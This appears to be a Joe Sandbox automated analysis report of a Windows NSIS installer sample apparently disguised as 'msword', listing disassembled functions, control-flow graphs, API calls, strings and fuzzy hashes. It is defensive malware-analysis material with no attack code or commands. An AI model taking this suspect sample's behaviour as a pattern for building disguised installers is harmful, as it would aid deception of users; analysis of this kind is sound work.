                                                                        • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                        • API String ID: 2872004960-3619442763
                                                                        • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                        • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                        • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                        • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE
                                                                        Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                                                        APIs
                                                                          • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                          • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                          • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                        • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                                        • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                        • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                        • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                        • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                        • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                          • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                        • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                                        • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                        • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                        • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                        • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                        • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                        • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                        • API String ID: 608394941-1650083594
                                                                        • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                        • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                        • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                        • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E
                                                                        Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        • lstrcatW.KERNEL32(00000000,00000000,TargetedRejectAccomplishComicsEngagementRendered,004CB0B0,00000000,00000000), ref: 00401A76
                                                                        • CompareFileTime.KERNEL32(-00000014,?,TargetedRejectAccomplishComicsEngagementRendered,TargetedRejectAccomplishComicsEngagementRendered,00000000,00000000,TargetedRejectAccomplishComicsEngagementRendered,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                        • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$TargetedRejectAccomplishComicsEngagementRendered
                                                                        • API String ID: 4286501637-1929300520
                                                                        • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                        • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                        • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                        • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE
                                                                        Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 587 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 590 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 587->590 591 4035d7-4035dc 587->591 599 403615 590->599 600 4036fc-40370a call 4032d2 590->600 592 4037b6-4037ba 591->592 602 40361a-403631 599->602 606 403710-403713 600->606 607 4037c5-4037ca 600->607 604 403633 602->604 605 403635-403637 call 403336 602->605 604->605 611 40363c-40363e 605->611 609 403715-40372d call 403368 call 403336 606->609 610 40373f-403769 GlobalAlloc call 403368 call 40337f 606->610 607->592 609->607 637 403733-403739 609->637 610->607 635 40376b-40377c 610->635 613 403644-40364b 611->613 614 4037bd-4037c4 call 4032d2 611->614 619 4036c7-4036cb 613->619 620 40364d-403661 call 405e0c 613->620 614->607 623 4036d5-4036db 619->623 624 4036cd-4036d4 call 4032d2 619->624 620->623 634 403663-40366a 620->634 631 4036ea-4036f4 623->631 632 4036dd-4036e7 call 407281 623->632 624->623 631->602 636 4036fa 631->636 632->631 634->623 640 40366c-403673 634->640 641 403784-403787 635->641 642 40377e 635->642 636->600 637->607 637->610 640->623 643 403675-40367c 640->643 644 40378a-403792 641->644 642->641 643->623 645 40367e-403685 643->645 644->644 646 403794-4037af SetFilePointer call 405e0c 644->646 645->623 647 403687-4036a7 645->647 650 4037b4 646->650 647->607 649 4036ad-4036b1 647->649 651 4036b3-4036b7 649->651 652 4036b9-4036c1 649->652 650->592 651->636 651->652 652->623 653 4036c3-4036c5 652->653 653->623
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00403598
                                                                        • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                          • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                          • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                        • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                        Strings
                                                                        • soft, xrefs: 00403675
                                                                        • Null, xrefs: 0040367E
                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                        • Error launching installer, xrefs: 004035D7
                                                                        • Inst, xrefs: 0040366C
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                        • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                        • API String ID: 4283519449-527102705
                                                                        • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                        • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                        • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                        • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C
                                                                        Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 654 40337f-403396 655 403398 654->655 656 40339f-4033a7 654->656 655->656 657 4033a9 656->657 658 4033ae-4033b3 656->658 657->658 659 4033c3-4033d0 call 403336 658->659 660 4033b5-4033be call 403368 658->660 664 4033d2 659->664 665 4033da-4033e1 659->665 660->659 666 4033d4-4033d5 664->666 667 4033e7-403407 GetTickCount call 4072f2 665->667 668 403518-40351a 665->668 669 403539-40353d 666->669 680 403536 667->680 682 40340d-403415 667->682 670 40351c-40351f 668->670 671 40357f-403583 668->671 673 403521 670->673 674 403524-40352d call 403336 670->674 675 403540-403546 671->675 676 403585 671->676 673->674 674->664 689 403533 674->689 678 403548 675->678 679 40354b-403559 call 403336 675->679 676->680 678->679 679->664 691 40355f-403572 WriteFile 679->691 680->669 685 403417 682->685 686 40341a-403428 call 403336 682->686 685->686 686->664 692 40342a-403433 686->692 689->680 693 403511-403513 691->693 694 403574-403577 691->694 695 403439-403456 call 407312 692->695 693->666 694->693 696 403579-40357c 694->696 699 40350a-40350c 695->699 700 40345c-403473 GetTickCount 695->700 696->671 699->666 701 403475-40347d 700->701 702 4034be-4034c2 700->702 703 403485-4034b6 MulDiv wsprintfW call 404f72 701->703 704 40347f-403483 701->704 705 4034c4-4034c7 702->705 706 4034ff-403502 702->706 712 4034bb 703->712 704->702 704->703 709 4034e7-4034ed 705->709 710 4034c9-4034db WriteFile 705->710 706->682 707 403508 706->707 707->680 711 4034f3-4034f7 709->711 710->693 713 4034dd-4034e0 710->713 711->695 715 4034fd 711->715 712->702 713->693 714 4034e2-4034e5 713->714 714->711 715->680
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 004033E7
                                                                        • GetTickCount.KERNEL32 ref: 00403464
                                                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                        • wsprintfW.USER32 ref: 004034A4
                                                                        • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                        • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: CountFileTickWrite$wsprintf
                                                                        • String ID: ... %d%%$P1B$X1C$X1C
                                                                        • API String ID: 651206458-1535804072
                                                                        • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                        • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                        • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                        • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9
                                                                        Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 716 404f72-404f85 717 405042-405044 716->717 718 404f8b-404f9e 716->718 719 404fa0-404fa4 call 406805 718->719 720 404fa9-404fb5 lstrlenW 718->720 719->720 722 404fd2-404fd6 720->722 723 404fb7-404fc7 lstrlenW 720->723 726 404fe5-404fe9 722->726 727 404fd8-404fdf SetWindowTextW 722->727 724 405040-405041 723->724 725 404fc9-404fcd lstrcatW 723->725 724->717 725->722 728 404feb-40502d SendMessageW * 3 726->728 729 40502f-405031 726->729 727->726 728->729 729->724 730 405033-405038 729->730 730->724
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                        • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                        • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                        • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                        • String ID:
                                                                        • API String ID: 2740478559-0
                                                                        • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                        • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                        • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                        • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98
                                                                        Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 731 401eb9-401ec4 732 401f24-401f26 731->732 733 401ec6-401ec9 731->733 734 401f53-401f7b GlobalAlloc call 406805 732->734 735 401f28-401f2a 732->735 736 401ed5-401ee3 call 4062a3 733->736 737 401ecb-401ecf 733->737 750 4030e3-4030f2 734->750 751 402387-40238d GlobalFree 734->751 739 401f3c-401f4e call 406009 735->739 740 401f2c-401f36 call 4062a3 735->740 748 401ee4-402702 call 406805 736->748 737->733 741 401ed1-401ed3 737->741 739->751 740->739 741->736 747 401ef7-402e50 call 406009 * 3 741->747 747->750 763 402708-40270e 748->763 751->750 763->750
                                                                        APIs
                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                        • GlobalFree.KERNELBASE(00819EC0), ref: 00402387
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: FreeGloballstrcpyn
                                                                        • String ID: Exch: stack < %d elements$Pop: stack empty$TargetedRejectAccomplishComicsEngagementRendered
                                                                        • API String ID: 1459762280-187782834
                                                                        • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                                        • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                        • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                                        • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD
                                                                        Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 766 4022fd-402325 call 40145c GetFileVersionInfoSizeW 769 4030e3-4030f2 766->769 770 40232b-402339 GlobalAlloc 766->770 770->769 771 40233f-40234e GetFileVersionInfoW 770->771 773 402350-402367 VerQueryValueW 771->773 774 402384-40238d GlobalFree 771->774 773->774 777 402369-402381 call 405f51 * 2 773->777 774->769 777->774
                                                                        APIs
                                                                        • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                        • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                        • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                        • GlobalFree.KERNELBASE(00819EC0), ref: 00402387
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                        • String ID:
                                                                        • API String ID: 3376005127-0
                                                                        • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                        • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                        • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                        • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19
                                                                        Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 782 402b23-402b37 GlobalAlloc 783 402b39-402b49 call 401446 782->783 784 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 782->784 789 402b70-402b73 783->789 784->789 790 402b93 789->790 791 402b75-402b8d call 405f6a WriteFile 789->791 792 4030e3-4030f2 790->792 791->790 796 402384-40238d GlobalFree 791->796 796->792
                                                                        APIs
                                                                        • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                        • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                        • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
